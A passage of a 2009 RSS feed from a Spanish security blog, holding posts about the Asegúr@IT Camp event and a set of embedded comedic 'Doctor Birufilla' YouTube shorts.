/&gt;&lt;br /&gt;Saludos Malignos!&lt;br /&gt;&lt;br /&gt;PD: Os pondremos el vídeo de las sesiones y las diapositivas y algunas fotos para que tengáis toda la info que parecéis de DEC Deluxe o Viceversa ;)&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;a href="http://elladodelmal.blogspot.com" target="new"&gt;http://elladodelmal.blogspot.com&lt;/a&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/21555208-7970045019015012693?l=elladodelmal.blogspot.com'/&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/ElLadoDelMal/~4/O5R4gO7tz6k" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/ElLadoDelMal/~3/O5R4gO7tz6k/las-cronicas-de-la-campinglance.html</link><author>noreply@blogger.com (Maligno)</author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">10</thr:total><feedburner:origLink>http://elladodelmal.blogspot.com/2009/10/las-cronicas-de-la-campinglance.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-21555208.post-4269288889137136381</guid><pubDate>Sun, 25 Oct 2009 07:02:00 +0000</pubDate><atom:updated>2009-10-25T08:19:24.782+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Comics</category><category domain="http://www.blogger.com/atom/ns#">Eventos</category><category domain="http://www.blogger.com/atom/ns#">Humor</category><title>Asegúr@IT Camp: Doctor Birufilla</title><description>&lt;div align="justify"&gt;He de reconocer que traer a Nico al Asegúr@IT Camp ha sido de fan fatal. Quería ver la charla y como no encontraba momento ni lugar, decidí que lo mejor sería organizármela yo.&lt;br /&gt;&lt;br /&gt;Aquí en la cabaña desde donde estoy escribiendo este post, tengo a Nico durmiendo en la otra habitación y mi lista de comics esperando a ser firmados, junto con mis DVD orginales de la primera y la segunda temporada y los muñeros de los clones. ¿Soy o no soy un fan fatal?&lt;br /&gt;&lt;br /&gt;En la charla he descubierto los cortos del Doctor Birufilla que, durante un año, a razón de uno por semana te enseñaban algo bajo el título de &lt;strong&gt;&lt;em&gt;"¿Sabías lo qué?" &lt;/em&gt;&lt;/strong&gt;en El País de las Tentaciones EP3.. Nico nos ha hecho una selección para la charla, pero he de reconocer, que mi preferido es el del que los cocodrilos lloran después de comer.&lt;br /&gt;&lt;center&gt;&lt;br /&gt;&lt;object width="425" height="344"&gt;&lt;param name="movie" value="http://www.youtube.com/v/cyTHaq-5Pss&amp;hl=es&amp;fs=1&amp;"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/cyTHaq-5Pss&amp;hl=es&amp;fs=1&amp;" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;&lt;object width="425" height="344"&gt;&lt;param name="movie" value="http://www.youtube.com/v/C19VP3uEWAM&amp;hl=es&amp;fs=1&amp;"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/C19VP3uEWAM&amp;hl=es&amp;fs=1&amp;" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;&lt;object width="425" height="344"&gt;&lt;param name="movie" value="http://www.youtube.com/v/iOsqNN6UvCw&amp;hl=es&amp;fs=1&amp;"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/iOsqNN6UvCw&amp;hl=es&amp;fs=1&amp;" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;&lt;object width="425" height="344"&gt;&lt;param name="movie" value="http://www.youtube.com/v/Y0f8RHOGrzU&amp;hl=es&amp;fs=1&amp;"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/Y0f8RHOGrzU&amp;hl=es&amp;fs=1&amp;" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;&lt;object width="425" height="344"&gt;&lt;param name="movie" value="http://www.youtube.com/v/eT3k3JHq8qo&amp;hl=es&amp;fs=1&amp;"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/eT3k3JHq8qo&amp;hl=es&amp;fs=1&amp;" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;&lt;object width="425" height="344"&gt;&lt;param name="movie" value="http://www.youtube.com/v/1M7DC5RycGU&amp;hl=es&amp;fs=1&amp;"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/1M7DC5RycGU&amp;hl=es&amp;fs=1&amp;" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;&lt;object width="425" height="344"&gt;&lt;param name="movie" value="http://www.youtube.com/v/w-PqAX5fDhg&amp;hl=es&amp;fs=1&amp;"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/w-PqAX5fDhg&amp;hl=es&amp;fs=1&amp;" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;/Center&gt;&lt;br /&gt;¿Tienes 40 minutos que llenar con unas risas? Hazte la cadena youtubiana, vete al primero y disfruta los 43. Nota: Hay uno repetido (luego falta el número 29) y otro que está a medias, pero sigue siendo divertidisimo encontrarte a Mister T, Epi y Blas, C3PO, R2D2, Tony Blair, o George Bush entre estas píldoras de Humor.&lt;br /&gt;&lt;br /&gt;Saludos Malignos!&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;a href="http://elladodelmal.blogspot.com" target="new"&gt;http://elladodelmal.blogspot.com&lt;/a&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/21555208-4269288889137136381?l=elladodelmal.blogspot.com'/&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/ElLadoDelMal/~4/9l9Rqmoy-t8" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/ElLadoDelMal/~3/9l9Rqmoy-t8/asegurit-camp-doctor-birufilla.html</link><author>noreply@blogger.com (Maligno)</author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">1</thr:total><feedburner:origLink>http://elladodelmal.blogspot.com/2009/10/asegurit-camp-doctor-birufilla.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-21555208.post-554082066245920745</guid><pubDate>Sat, 24 Oct 2009 22:19:00 +0000</pubDate><atom:updated>2009-10-25T00:20:42.397+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Eventos</category><category domain="http://www.blogger.com/atom/ns#">Twitel</category><title>Asegúr@IT Camp</title><description>&lt;div align="justify"&gt;Todo debuti. Acabaron las charlas. Gripe, un gramo de medicamentos y a la cama. Resaca.&lt;br /&gt;&lt;br /&gt;Saludos Malignos!&lt;br /&gt;&lt;br /&gt;PD: Sí, ya veo porque la gente usa twitter&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;a href="http://elladodelmal.blogspot.com" target="new"&gt;http://elladodelmal.blogspot.com&lt;/a&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/21555208-554082066245920745?l=elladodelmal.blogspot.com'/&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/ElLadoDelMal/~4/G41uJSqyZ_Q" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/ElLadoDelMal/~3/G41uJSqyZ_Q/asegurit-camp.html</link><author>noreply@blogger.com (Maligno)</author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">1</thr:total><feedburner:origLink>http://elladodelmal.blogspot.com/2009/10/asegurit-camp.html</feedburner:origLink></item></channel></rss>
